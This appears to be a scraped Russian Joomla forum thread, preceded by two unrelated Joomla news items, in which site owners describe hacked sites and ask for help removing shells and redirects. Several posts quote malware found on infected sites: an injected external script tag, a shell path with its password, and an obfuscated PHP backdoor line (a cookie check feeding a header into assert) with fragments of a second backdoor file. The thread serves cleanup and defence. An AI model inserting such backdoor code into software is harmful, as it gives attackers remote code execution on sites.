Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

• 792 Ответов
  • 292354 Просмотров
*

capricorn

• Завсегдатай
  • 1949
  • 118 / 3
А чего так бояться заражения? Что в этом такого страшного? Если есть норм бэкап, то найти заразу легко.

Встречается случаи когда кеш системы не чистится, и после чистки файлов все равно нет результата
один из способов это почистить в БД таблицу #_session  не всегда помогает на 100%, видимо еще и кешируется у провайдера или на каких либо удаленных серверах

Кэшируется обычно на компе вирусня и ждет ftp соединения.

« Последнее редактирование: 24.04.2015, 10:34:37 от capricorn »
*

creative3d

• Захожу иногда
  • 196
  • 6 / 0
Что можно сделать для такой ситуации:
Мобильный редирект, шелл вроде бы найден и дырки залатаны. Но периодически появляется:
Код: javascript
<script type="text/javascript" src="http://*.ru"></script>

в настройках jcomments (был 1 раз в customHtml модуле)
Сперва сменил пароль user и root, вскоре опять появился. Потом сменил пароль к базе данных. Вирус исчез, но может через несколько недель опять появляться, опять меняю пароль к базе данных и всё нормально.
Какие тут дыры можно залатать, и нельзя ли как-нибудь по-другому прятать файл configuration.php ? Там права 444, но может этого недостаточно...
(установлен plugin Marco's SQL Injection - LFI Interceptor)
Кто еще сталкивался с подобного рода скриптом, напишите, что вам помогло.
Спасибо. ^-^
*

Владимир999

• Захожу иногда
  • 106
  • 1 / 0
Проверь веб директорию http://yandex.ru/promo/manul#about
*

creative3d

• Захожу иногда
  • 196
  • 6 / 0
Ссылка вроде занимательная, но сканирование не завершилось...
PHP error - Undefined variable: filePath
Сканирование давно проходили. Думал, может что-то конкретное, связанное с БД можно узнать. Т.к. насколько я понимаю, "взламывается" последнее время только пароль от БД. Хотя я плохо понимаю всё равно...
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
После работ связанных с чисткой и обновлением, закрытием всех уязвимостей, меняются все пароли иногда даже логины если они не уникальны (типа admin), пароли все набор цифр и букв как заглавные так и прописные и все возможные знаки, длина паролей от 12-14 знаков, закрывается панель управления http авторизацией как минимум. Все довольно просто.
*

creative3d

• Захожу иногда
  • 196
  • 6 / 0
закрывается панель управления http авторизацией как минимум.
- А разве есть панели управления без авторизации? Может я чего-то не понимаю?..
- А вот у ispmanager и phpMyAdmin - root логин так и остается root? Где-то можно/нужно изменить? (хотя у phpMyAdmin вроде не root стоит, но root вроде тоже активен...)
- Для входа в админку сайта стоит ли включать новую фичу "двух-факторная авторизация"?
- Что думаете по поводу Admin Tools Pro от Akeeba?
Спасибо.
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
- А разве есть панели управления без авторизации? Может я чего-то не понимаю?..
http://httpd.apache.org/docs/2.2/mod/mod_auth_digest.html#msie
- А вот у ispmanager и phpMyAdmin - root логин так и остается root? Где-то можно/нужно изменить? (хотя у phpMyAdmin вроде не root стоит, но root вроде тоже активен...)
root используется только для настроек сервера, для работы с сайтом для каждого сайта! создается свой пользователь для панели и базы данных и своя бд
[/quote]
- Для входа в админку сайта стоит ли включать новую фичу "двух-факторная авторизация"?
Как пожелаете.
- Что думаете по поводу Admin Tools Pro от Akeeba?
Ни чего стороннего ни когда не рекомендую, правильная настройка сервера и своевременное обновление движка и расширений, хватает на все 100%.
*

askona

• Захожу иногда
  • 98
  • 2 / 0
Стал счастливым обладателем очередного вируса на Joomla 1.5.26. Вроде избавился от редиректа и от самого шелла, отследил в логах как заходит взломщик на сайт. Когда удалил пару файлов редиректа, увидел в корне сайта только записанный  файл trd.php, загруженный у меня на глазах. Тут же его скачал. Прикладываю txt версию этого скрипта, суда по коду, он после выполнения должен был удалиться, но не успел. Комментарии в файле написаны по русски и много там интересного. И что самое интересное - редирект через redirect.ru был на ya.ru - для чего не понятно.
*

winstrool

• Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Стал счастливым обладателем очередного вируса на Joomla 1.5.26. Вроде избавился от редиректа и от самого шелла, отследил в логах как заходит взломщик на сайт. Когда удалил пару файлов редиректа, увидел в корне сайта только записанный  файл trd.php, загруженный у меня на глазах. Тут же его скачал. Прикладываю txt версию этого скрипта, суда по коду, он после выполнения должен был удалиться, но не успел. Комментарии в файле написаны по русски и много там интересного. И что самое интересное - редирект через redirect.ru был на ya.ru - для чего не понятно.
Файлик довольна токи интересный и грамотно написан, на досуге по анализирую...
*

askona

• Захожу иногда
  • 98
  • 2 / 0
Опишу, что я делал на своем сайте:
сам шелл прописался в папке: /administrator/components/com_phocagallery/front/assets/js/shadowbox/src/skin/classic/icons/config.php, при переходе по ссылке, требует ввод пароля, пароль тоже нашел в логах: ?6xlnchp7, судя по скрипту этот файл может прописаться в любую дальнюю папку. Далее Удалил строку с preg_replace сверху файла componets/com_weblinks/router.php. Нашел лишние файлы: /componets/com_content/articled.php , /componets/com_content/category.php , /includes/inc.class.php, снес их, получил ошибку в файле /includes/application.php ,в нем сверху удалил инклуд, и сайт заработал. Все это прописано в выложенном сверху скрипте. Может кому то поможет. Скорее всего, это было сделано для того, чтобы сайт выпал из индекса, смысл делать редирект на ya.ru. Как то так.
« Последнее редактирование: 02.06.2015, 16:29:25 от askona »
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
Файлик довольна токи интересный и грамотно написан, на досуге по анализирую...
Обычный загрузочный/управляющий.

Вот всегда мысль одна есть и будет
- их бы энергию да в мирных целях
*

ShniderHost

• Осваиваюсь на форуме
  • 24
  • 0 / 3
Лечим Joomla от вирусов :) https://joomla.shneider-host.ru/blog/optimizatsiia-i-bezopasnost-joomla/kak-ochistit-sait-joomla-ot-virusov

инструкция для новичков :) если вылечить не удалось самостоятельно, но рекомендую все же обратится к профессионалам, по поводу
flyingspook - слышал положительные отзывы, и берет он не дорого.
*

creative3d

• Захожу иногда
  • 196
  • 6 / 0
Некоторые мои вопросы были проигнорированы, нашел ответы, их нужно добавить в тему!
-----------------------------------------------------------------------
configuration.php прячем за пределы сайта в любую папку:
administrator/includes/defines.php - здесь меняем путь,
/includes/defines.php - здесь меняем путь на
define('JPATH_CONFIGURATION', JPATH_ROOT . '/../folder');
Также прячем папки tmp и logs (путь в админке сайта)
*

dormidont

• Осваиваюсь на форуме
  • 19
  • 0 / 0
хостинговый антивирь нашел очердную каку
httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/wso2.php Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
хостинговый антивирь нашел очердную каку
httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/wso2.php Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL
Так это уже не атака, а shell залили
*

laralexy1

• Новичок
  • 1
  • 0 / 0
Ребят, помогите убрать shell, ужасные ссылки левые на сайте  http://www.sosnovobor.ru/sanatornoe-lechenie.html
*

winstrool

• Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Ребят, помогите убрать shell, ужасные ссылки левые на сайте  http://www.sosnovobor.ru/sanatornoe-lechenie.html

Пишите мне в аську, тема с отзывами https://forum.antichat.ru/threads/375030/
*

galyabu

• Новичок
  • 2
  • 0 / 0
Здравствуйте! Похоже ли это на шелл? обнаружила его на всех своих сайтах на хосте (12 шт, из них Joomla - 11 шт). php файл был размещен даже на сайте html5 (собственно, он мне и помог обнаружить этот левый php). удалила его со всех сайтов и прекратилось еженедельное заражение js файлов мобильным редиректом.
*

rmnk

• Осваиваюсь на форуме
  • 36
  • 1 / 1
Здравствуйте! Обнаружил, что в папке с шаблоном несколько дней назад появился файл .php со странным названием

файл содержит такой код (несколько цифр изменил на всякий случай)
Спойлер
[свернуть]

что это такое, кто-нибудь может подсказать?
« Последнее редактирование: 27.11.2015, 12:07:44 от rmnk »
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу
Ну явно не код скрипта Joomla . Нет проверки на вход через index.php Joomla. Загрузка кода из массива POST
Код
// no direct access

defined( '_JEXEC' ) or die( 'Restricted index access' );
Поставь временно JHackGuard и запрети выполнение POST . И ищи шелл.
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
что это такое, кто-нибудь может подсказать?
Вас уже взломали, чистите сайт и обновляйте все что требуется.
*

rmnk

• Осваиваюсь на форуме
  • 36
  • 1 / 1
Вас уже взломали, чистите сайт и обновляйте все что требуется.

А есть смысл восстанавливать бекап недельной давности, например (файл этот залит позже) и расслабиться или все равно взломают опять, раз уже какая-то есть "дыра"
*

winstrool

• Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
А есть смысл восстанавливать бекап недельной давности, например (файл этот залит позже) и расслабиться или все равно взломают опять, раз уже какая-то есть "дыра"
А как вы можете убедиться когда был файл залит?, можете сделать по старому бекапу сумму md5hash файлов старого движка и щас взломаного, если вы уверены что старый конечно чистый, выявить дату файлов которые попадают в разницу и проанализировать по ним логи с целью выявления ошибки и пофиксить, если просто откатывать бекап взлом рано или поздно снова повторится, также обязательны профилактические меры
*

rmnk

• Осваиваюсь на форуме
  • 36
  • 1 / 1
Спасибо за ответы. Будем лечить
*

creative3d

• Захожу иногда
  • 196
  • 6 / 0
Здравствуйте. Новогодний подарок тут получил, вроде он не успел сработать, но не знаю... Скажите, пожалуйста, что это такое, как, почему и зачем? !
1) В конец файла /includes/defines.php добавилась строчка:
Код: php
if(strpos(implode($_SERVER),"O:")){exit;}
2) В конец файла /libraries/joomla/access/rule.php добавилась строчка:
if((md5(@$_COOKIE[ssid])=="0d39ee6941ac9d79b6fe314bbaca617e")){error_reporting(0);@array_map("a\x73"."sert",(array) $_SERVER[HTTP_X]);}
3) Появился новый файл: /libraries/simplepie/simplepie.lib.php (см. вложение)
*

winstrool

• Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Здравствуйте. Новогодний подарок тут получил, вроде он не успел сработать, но не знаю... Скажите, пожалуйста, что это такое, как, почему и зачем? !
1) В конец файла /includes/defines.php добавилась строчка:
if(strpos(implode($_SERVER),"O:")){exit;}
2) В конец файла /libraries/joomla/access/rule.php добавилась строчка:
if((md5(@$_COOKIE[ssid])=="0d39ee6941ac9d79b6fe314bbaca617e")){error_reporting(0);@array_map("a\x73"."sert",(array) $_SERVER[HTTP_X]);}
3) Появился новый файл: /libraries/simplepie/simplepie.lib.php (см. вложение)
Первая строчка это фикс последней баги через сессию, второй это бегдор, вообщем чел ломанул и закрепился чтоб кроме него больше ни кто, не лез)))

Вложенный файл тоже является запутанным бегдором:
36. $id = $_SERVER['HTTP_SESSION'];
...
114.  */ $a='as';
...
 */ $b='sert'; $a=$a.$b;
...
161. */ $start = strpos($sess,'0d39ee');
...
202.  */ if($start===0){@${a}($id);}
« Последнее редактирование: 16.12.2015, 11:56:49 от winstrool »
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
Скажите, пожалуйста, что это такое, как, почему и зачем? !
Возвращается 2011г.
Все взломы перешли давно в стадию.
Делают взломы для индивидуального использования, т.е. дальнейшей продажи или слива трафика.
Набирают сервера для чего то массового.
Ну и как все "угоны" сначала в отстойник, и потом использование. (многие и знать не будут что они уже давным давно взломаны)
*

creative3d

• Захожу иногда
  • 196
  • 6 / 0
Возвращается 2011г.
Я имел в виду конкретно мой случай, если я правильно понял...

Спасибо за ответ, winstrool.
это фикс последней баги через сессию
Что за последняя бага? В 3.4.5 была? В 3.4.6 есть? И зачем он ее пофиксил? )
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
Я имел в виду конкретно мой случай, если я правильно понял...

Спасибо за ответ, winstrool.Что за последняя бага? В 3.4.5 была? В 3.4.6 есть? И зачем он ее пофиксил? )
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?
Если у вас хостинг и нет разграничений по папкам пользователям то да имеет доступ ко всему.
Профиксили баг 3.4.5 и закрыли возможность другим взломать.
Имеют доступ сейчас ко всему и файлам и к бд

В 3.4.6 нету она закрывает все что было в 3.4.5
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2523
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium